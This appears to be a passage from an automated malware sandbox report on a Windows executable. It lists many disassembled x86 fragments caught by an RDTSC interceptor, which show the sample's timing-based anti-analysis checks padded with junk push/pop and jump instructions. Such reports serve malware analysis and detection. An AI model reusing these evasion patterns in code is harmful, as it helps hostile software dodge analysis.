                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBCB98 second address: FBCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, edx 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov dword ptr [ebp+122D2FE0h], eax 0x00000023 mov eax, dword ptr [ebp+122D0F31h] 0x00000029 push FFFFFFFFh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F389CFCC948h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 clc 0x00000046 jmp 00007F389CFCC952h 0x0000004b nop 0x0000004c push edx 0x0000004d jno 00007F389CFCC95Ah 0x00000053 pop edx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBCC17 second address: FBCC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC428B second address: FC4291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC74D9 second address: FC74DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC74DE second address: FC7508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F389CFCC94Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jns 00007F389CFCC946h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F389CFCC946h 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC763F second address: FC7643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7643 second address: FC7666 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F389CFCC952h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jng 00007F389CFCC946h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC92A0 second address: FC92D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389C8383A5h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F389C8383A5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE25F second address: FCE26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE26F second address: FCE279 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE475 second address: FCE47B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1EAD second address: FD1EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1EC4 second address: FD1EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F389CFCC946h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6F63 second address: FD6F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6F67 second address: FD6F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6150 second address: FD6154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6154 second address: FD6168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6168 second address: FD6171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6171 second address: FD6179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6179 second address: FD617D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD617D second address: FD6183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD62E0 second address: FD6310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F389C838396h 0x00000009 jc 00007F389C838396h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F389C8383AAh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6310 second address: FD6318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6318 second address: FD631C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD631C second address: FD6328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6496 second address: FD64CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F389C838396h 0x0000000a jmp 00007F389C8383A3h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 jl 00007F389C838398h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 js 00007F389C83839Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD64CD second address: FD64D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD64D1 second address: FD64D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD64D9 second address: FD64E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F389CFCC94Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6A4D second address: FD6A5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F389C838396h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C16 second address: FD6C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C20 second address: FD6C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F389C8383A8h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DAB second address: FD6DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F389CFCC94Ah 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA33E second address: FDA344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE8A9 second address: FDE8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE8AD second address: FDE8CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F389C838396h 0x0000000d jmp 00007F389C83839Ch 0x00000012 jns 00007F389C838396h 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE8CD second address: FDE906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F389CFCC946h 0x00000019 jmp 00007F389CFCC959h 0x0000001e jno 00007F389CFCC946h 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE906 second address: FDE921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A4h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDEA78 second address: FDEA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F389CFCC946h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE429 second address: FDE43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A0h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE43D second address: FDE441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF1BC second address: FDF1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F389C838396h 0x00000009 jnp 00007F389C838396h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3D03 second address: FE3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3D09 second address: FE3D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F389C8383A9h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8304 second address: FE8308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8444 second address: FE844D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE844D second address: FE8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8453 second address: FE8459 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8459 second address: FE8465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F389CFCC946h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE85BF second address: FE85D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F389C838396h 0x00000009 js 00007F389C838396h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE877C second address: FE8788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F389CFCC946h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8BCF second address: FE8BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8BD5 second address: FE8BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F389CFCC946h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8D48 second address: FE8D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F389C838396h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8D55 second address: FE8D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8D59 second address: FE8D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8EA7 second address: FE8F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC957h 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F389CFCC953h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F389CFCC956h 0x0000001e jmp 00007F389CFCC94Ah 0x00000023 jmp 00007F389CFCC94Eh 0x00000028 popad 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8F0F second address: FE8F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F389C83839Ch 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9060 second address: FE9065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE921A second address: FE922C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007F389C838396h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE922C second address: FE9249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC955h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9249 second address: FE9250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62AF7 second address: F62AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62AFF second address: F62B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62B06 second address: F62B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62B0C second address: F62B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A0h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE968E second address: FE9692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7E29 second address: FE7E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7E35 second address: FE7E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F389CFCC957h 0x0000000f je 00007F389CFCC946h 0x00000015 jmp 00007F389CFCC94Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CFB4 second address: F9CFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CFB8 second address: F83D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389CFCC94Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov cx, di 0x00000011 call dword ptr [ebp+1246AD2Fh] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F389CFCC957h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D438 second address: F9D43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D43C second address: F9D441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D441 second address: F9D479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F389C838396h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F389C8383A9h 0x00000016 jmp 00007F389C83839Dh 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D57F second address: F9D583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D583 second address: F9D5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F389C8383ADh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jng 00007F389C8383ABh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D5B5 second address: F9D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC94Dh 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jl 00007F389CFCC94Ch 0x00000013 jc 00007F389CFCC946h 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F389CFCC946h 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D769 second address: F9D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F389C838398h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sbb ecx, 012273DAh 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007F389C8383A7h 0x00000034 popad 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D7B3 second address: F9D7C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D7C2 second address: F9D7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389C8383A5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D8B5 second address: F9D8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D8B9 second address: F9D900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F389C838396h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 pushad 0x00000027 jmp 00007F389C8383A9h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D9CE second address: F9D9E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC94Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DB3C second address: F9DB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D3164h], edx 0x0000000e push 00000004h 0x00000010 mov cx, bx 0x00000013 nop 0x00000014 je 00007F389C8383A8h 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F389C838396h 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DB5E second address: F9DB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DED4 second address: F9DEDE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DEDE second address: F9DF2A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F389CFCC94Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F389CFCC948h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2980h], edi 0x0000002d push 0000001Eh 0x0000002f mov dword ptr [ebp+122D5963h], ecx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
